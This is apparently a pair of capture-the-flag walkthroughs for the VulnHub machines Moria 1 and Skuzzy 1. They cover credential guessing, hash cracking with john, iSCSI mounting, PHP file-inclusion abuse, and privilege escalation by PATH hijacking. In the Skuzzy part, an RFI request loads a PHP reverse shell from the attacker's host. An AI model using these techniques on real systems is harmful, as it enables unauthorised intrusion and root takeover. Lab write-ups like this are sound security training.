Download
https://www.vulnhub.com/entry/moria-1,187/
Goal
uid=0(root) gid=0(root) groups=0(root)
Walkthrough
Initial nmap shows ftp on 21, ssh on 22, and web on 80
Looking at the website it shows the Gates of Moria
Next scan with dirb and we get a listable directory w
Browsing to the directory we see that there is an h directory as well
Going down the rabbit hole we end up spelling whisper and a final directory of the_abyss
From here there are a series of random messages with each refresh. There were 13 in total, but they just repeat at random
Unable to find anything else we go back to the FTP and try anonymous login, but nothing...it was checked during nmap, but whatever
First we need a username so I gather all the names from the random messages from the_abyss
Balin
Oin
Ori
Fundin
Nain
Eru
Maeglin
Telchar
Thrain
Dain
Next we need a password, but I only have my limited movie only knowledge of LOTR...great. So I remember when they're at the Gates of Moria and they speak the elvish word for friend. No idea what they said though...to Google!
We search for "gates of moria friend' and the results yield Doors of Durin. Scrolling through we find the word...Mellon. Lots of trial and error took place and no luck. Then looking at the FTP banner it says welcome Balrog...duh
We try the combinations of uppercase/lowercase for name/password and finally get a match Balrog/Mellon. We're in, but with limited abilities...
Even though we're limited we can still browse the file system...
Then I remember SSH, but that's a dead end :(
So I attempt to find a username, but no luck in /home or /etc/passwd
But /var/mail shows users :)
Now that we have a username Ori, we need a password...
Still with browse capabilities I take a look through the web directories and sure enough there is a random string directory
Back to the webs and browsing to the new directory yields usernames and passkeys
No known MD5 hashes found for user Ori or any others, so I took at the page source and sure enough Salt with format are commented out
Now what...back to Google. This one took me some time, but some success after random searches and playing around with the format led me to this search "john format dynamic" and this helpful page
First the username, pass, and salt were properly added to a file
Next running the correct format with john against the file yielded all the passwords
Using the new credentials for Ori, we're able to get a shell
Scouring the entire system and finding nothing, I finally came back to the /home/Ori directory and took a look at the .ssh folder
Looking at the known_host file we see Ori connects to localhost? With that I try ssh as root to localhost and BOOM...root and flag.txt :)
Download
https://www.vulnhub.com/entry/ew_skuzzy-1,184/
Goal
flags
uid=0(root) gid=0(root) groups=0(root)
Walkthrough
Initial nmap shows ssh on 22, web on 80, and iscsi on 3260
Looking at the website we get a hint to scan the website using dirbuster
I'm more of a dirb guy, so let's see what we find using that tool
*snippet of dirb results
All of the dirb results were junk except the last long URL
Looking at the page, oh hello Lionel
Let's look at the page source and there is a long commented string (actually strings)
Base64 decode and Lionel trolled us
With nothing else, we go back to see what we can find from the open iscsi port on 3260
Wait, ew skuzzy...iscsi....oh I get it :)
Google is always your friend, which yielded this helpful page
https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/
After installing iscsi tools I'm able to discover and connect to the target
iscsiadm -m node -p 192.168.0.130 -l iqn.2017-02.local.skuzzy:storage.sys0
fdisk reveals a new disk available at /dev/sdb
First we create the folder to mount to /mnt/skuzzy and then we mount and list the folder contents. Look at that, flag1 is revealed
flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
Looking back at the mounted disk contents we see what appears to be another mountable disk called bobsdisk.dsk. Creating the folder, mounting, and listing we find an email file ToAlice.eml and an encrypted file ToAlice.csv.enc
Looking at the ToAlice.eml, there's a lot of useful information and some misleading in my opinion about how to decrypt the ToAlice.csv.enc file. Also flag2 is revealed :)
flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
So to decrypt the ToAlice.csv.enc file the email gives you everything you need including the password. It hints that you need to use RockYou, but the password is right there and with that flag3 is revealed and more URLs
openssl enc -d -aes256 -in /mnt/bob/ToAlice.csv.enc -out /mnt/bob/ToAlice.csv -k supercalifragilisticoespialidoso
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}
Now back to the webs and the URLs we found. First one has some sweet scrolling marquee
Source code reveals more long commented strings
Base64 of strings reveal a Seinfeld troll :P
Next URL looks more interesting and states in the title we're on the right track
Looking at the links, first three are nothing of importance
welcome.php
flag.php
The last link reader.php has a new link called Load Feed. When clicked it actually calls out to a file located on the local file system named data.txt
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt
From here it looks like we might be able to do some LFI, so back to Google and we find this helpful site for a reminder :) https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
Giving it a try on the data.txt file and we're giving a long string
Base64 on the string reveals the source code and it seems that normal php tags use ##php## instead
With that I started checking all the .php files associated with the links and flag.php revealed flag4 also told that we'll need it later for shell access
flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
Base64 of reader.php was the entire source code, but hints that we need to provide a key
*snippet of reader.php
Trying RFI to Kali and told that we need a key for authentication
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.0.131
Before anything I prep the php reverse shell on Kali, but making sure that I replace the starting and ending php syntax to ##php##
Using flag4 as the key and calling our php reverse shell we now have a limited reverse shell :)
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.0.131/bzyo.php
Privilege escalation took me some time as I was stuck on finding something with iscsi. After going through the go to privilege escalation guide, the file alicebackup stood out as the other key files included alice in the name
Looking closer at the file it's executable so I run it and it runs the command /usr/bin/id and attempts an ssh connection
Spent some time looking at HOSTALIASES, but that obviously didn't pan out so I took a step back...
I know that alicebackup runs id utility after executed as it prints out that root is running the program. However it's probably not using a full path and relative instead
Let's copy /bin/sh to /tmp folder and rename it id and then add /tmp to the PATH
Running alicebackup now triggers id utility at /tmp folder, but instead of giving the user it spawns a root shell and flag5 is revealed in the root folder :)
flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}
